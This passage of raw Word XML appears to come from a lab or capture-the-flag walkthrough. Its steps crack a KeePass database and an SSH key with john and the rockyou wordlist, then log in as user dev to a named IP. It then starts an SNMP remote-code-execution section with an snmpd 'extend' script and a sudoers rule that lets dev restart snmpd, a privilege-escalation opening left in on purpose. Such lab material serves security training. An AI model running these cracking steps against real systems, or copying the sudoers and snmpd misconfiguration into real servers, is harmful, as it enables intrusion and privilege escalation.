              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table43"/>
        <w:tblW w:w="858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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># This might take very long to crack</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">john --wordlist=/opt/wordlists/rockyou.txt keep2hash.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000290">
      <w:pPr>
        <w:spacing w:after="200" w:before="200"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91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table44"/>
        <w:tblW w:w="858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rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Require you to install keepass first</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Keepass secret.kdbx </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table45"/>
        <w:tblW w:w="858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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Right click on dev user, click on extract item and save it somewhere.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table46"/>
        <w:tblW w:w="859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95"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh2john id_rsa &gt; id_rsa2hash.txt </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table47"/>
        <w:tblW w:w="858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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># This might take awhile to crack</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">john --wordlist=/opt/wordlists/rockyou.txt id_rsa2hash.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 9 / 9:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table48"/>
        <w:tblW w:w="858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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Change the permission of the key before using it</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">ssh -i id_rsa dev@18.141.13.209</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g6o3snghawux" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table49"/>
        <w:tblW w:w="8565.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65"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#!/bin/sh</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A0">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A1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">who=`whoami`</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo "Executed via SNMP, running as $who"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo "First argument: $1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table50"/>
        <w:tblW w:w="8565.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65"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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extend [name] [program] [arguments]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">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A8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">extend testScript /script.sh test123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:spacing w:after="200" w:before="200"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AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table51"/>
        <w:tblW w:w="8565.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65"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># User privilege specification</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">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root</w:t>
              <w:tab/>
              <w:t xml:space="preserve">ALL=(ALL:ALL) ALL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cmnd_Alias USER_SERVICES = /usr/bin/systemctl start snmpd, /usr/bin/systemctl stop snmpd, /usr/bin/systemctl restart snmpd</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dev ALL=(ALL) USER_SERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
